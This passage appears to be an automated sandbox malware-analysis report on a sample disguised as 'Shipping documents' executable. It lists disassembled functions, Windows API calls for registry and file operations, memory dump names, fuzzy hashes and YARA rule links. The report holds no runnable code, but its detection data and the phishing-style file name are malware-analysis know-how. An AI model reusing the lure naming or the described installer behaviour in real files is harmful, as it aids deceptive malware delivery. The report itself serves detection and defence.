Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-823278215
Opcode ID: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
Instruction ID: 407710f282aa9913273e94a45afee278ff037c1c447fef60eab8b448319c413c
Opcode Fuzzy Hash: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
Instruction Fuzzy Hash: 56C012326050309BC3201B69AD0CA87BE94EB906A13018635B989E2220D2308C008AE8

Function 00402656 Relevance: 4.6, APIs: 3, Instructions: 77registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0040C108,00000023,?,00000011,00000002), ref: 004026C3
RegSetValueExW.KERNELBASE(?,?,?,?,0040C108,?,?,00000011,00000002), ref: 00402710
RegCloseKey.ADVAPI32(?,?,?,0040C108,?,?,00000011,00000002), ref: 0040271D

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 8edcd19f25d8d05edf2d8148b6cc1e24fb060151bf47dec0a3455c4438ded43c
Instruction ID: b85799c5b09c0d4e5107b9a6a50aeda658419008c73e2f9c6ba38a7de01b1a8e
Opcode Fuzzy Hash: 8edcd19f25d8d05edf2d8148b6cc1e24fb060151bf47dec0a3455c4438ded43c
Instruction Fuzzy Hash: CF21D072608311ABD711AFA5CC85B2FBBE8EB98760F10093EF541F71C1C7B99901879A

Function 0040219D Relevance: 4.6, APIs: 3, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004068E6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
Part of subcall function 004068E6: GetProcAddress.KERNEL32(00000000), ref: 00406910

GetFileVersionInfoSizeW.KERNELBASE(0000000A,00000000,?,000000EE), ref: 004021B5
GlobalAlloc.KERNEL32(00000040,00000000), ref: 004021D1
GlobalFree.KERNEL32(?), ref: 00402252

Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Global$AddressAllocFileFreeHandleInfoModuleProcSizeVersionwsprintf
String ID:
API String ID: 1591220723-0
Opcode ID: 714b08ef66b9b43705571cd4ae7a9ae65d14389d566718652d15def65d7d5d3c
Instruction ID: 2bc947571e722f1263eb9e5f8c26a617dc66155635cdd3906f3980dfdfcdef41
Opcode Fuzzy Hash: 714b08ef66b9b43705571cd4ae7a9ae65d14389d566718652d15def65d7d5d3c
Instruction Fuzzy Hash: 6B213E31608301AFE710AFA1CD4592FBBE5EF84354F01483EFA41E21E1EB76D8159B16

Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,0040C108,?,?,00000011,00000002), ref: 0040271D
RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 1d42ab8b4145a25c79b294e04f02a9cb00a7c1bb6d884b11203412bb77f2baf5
Instruction ID: fb228a38f7146265a3f721d89abc8bf78f6fe6bd0b338e84b9d16a0e51430f88
Opcode Fuzzy Hash: 1d42ab8b4145a25c79b294e04f02a9cb00a7c1bb6d884b11203412bb77f2baf5
Instruction Fuzzy Hash: 5C11C235658302AFD7149FA4D98863BB3A4EF84315F10093FF102A21D1D7B85909CB5B

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
Instruction ID: 538a9e804dfe71f8462b772bc95ac31ea7b37d3b99b6caf0eca62282663b68d4
Opcode Fuzzy Hash: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
Instruction Fuzzy Hash: 4701D472A152309BD7196F28AC09B6B3699AB80711F15453AF901F72F1D2B89C018758

Function 0040691B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
Instruction ID: d43685c7aa133134ae341259a1979053aa5ebee8cfee21dedca447a2e346f0f1
Opcode Fuzzy Hash: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
Instruction Fuzzy Hash: 77D09E71218202AEEF055F20DE4AF1FBA65EF84710F104A2CF6A6D40F0D6718C24AA11

Function 00406B9D Relevance: 3.0, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00406591,?,?,00000000,004068AE,?,?,?,?), ref: 00406BA2
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406BB9

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
Instruction ID: 2641cd0fcf7a615d2272f2c652f3c677170a534def33f5957a60d90ba1304b54
Opcode Fuzzy Hash: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
Instruction Fuzzy Hash: 11D0A7712040316BC6042738DC0C45ABA56DB853707018735F9F6A22F1D7300C2186D4

Function 00406948 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040695F

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
Instruction ID: 496ccccc8c492c243bc388fe3eb656b5cfb520ee4410d2fb8332981663b8a2fe
Opcode Fuzzy Hash: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
Instruction Fuzzy Hash: 38E04672200229BBCF209B9ADC08D9FBFADEE957A07024026B805A3110D270EE21C6E4

Function 00406A0B Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,0041F538,00403348,?,0041F538,?,0041F538,?,00000004), ref: 00406A22

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
Instruction ID: 40df579de253d7cbce13811cecf730e98513d225cd3d08ff0a4c9fddec416105
Opcode Fuzzy Hash: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
Instruction Fuzzy Hash: F9E0BF32600129BBCF205B5ADC04E9FFF6DEE926A07114026F905A2150E670EE11DAE4

Function 004062A5 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062CE

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
Instruction ID: 8015555a5faba5d47a7295c794b4dc45a0f837954a803b2f281cb622c6ff763f
Opcode Fuzzy Hash: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
Instruction Fuzzy Hash: 38E0B6B201020ABEEF096F90DC0ADBB7A5DEB08310F00492EFA0694091E6B5AD30A634

Function 004062D8 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,004069A5,00000800,?,?,?,Exec,00000000,00000000), ref: 004062FC

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
Instruction ID: 212ff8f8ceecf1c7f7b975949926931c9c9ff354a47ded1b1035142b567bad43
Opcode Fuzzy Hash: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
Instruction Fuzzy Hash: 81D0123204020EBBDF116F909D05FAB3B2DAB08340F004436FE06A4091D775D930A758

Function 0040551A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070

SetDlgItemTextW.USER32(?,?,00000000), ref: 00405534

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: ItemTextlstrcat
String ID:
API String ID: 3433768297-0
Opcode ID: 5920e996c17b1682b3fbae24a7e7d90da5b24a4854a5be530623cad6f891222d
Instruction ID: 7223d39e7453991a543e52db0d97eef32dd042881d963cd8a47bb39f5a518605
Opcode Fuzzy Hash: 5920e996c17b1682b3fbae24a7e7d90da5b24a4854a5be530623cad6f891222d
Instruction Fuzzy Hash: F2C08C71008200BFE641AB04CC02F0FB7A9FFA0316F00C82EB09CE00D1C635C430CA26

Function 004054E8 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
Instruction ID: f4f70a023dfa60edfff8c312ec9360925e699ce3f775cceab6ab340ddbd6ed3a
Opcode Fuzzy Hash: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
Instruction Fuzzy Hash: BFC04C716402407ADA109B619D09F477755AB90700F5094257200E51E4D674F410CA1C

Function 00405503 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00405338), ref: 00405511

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
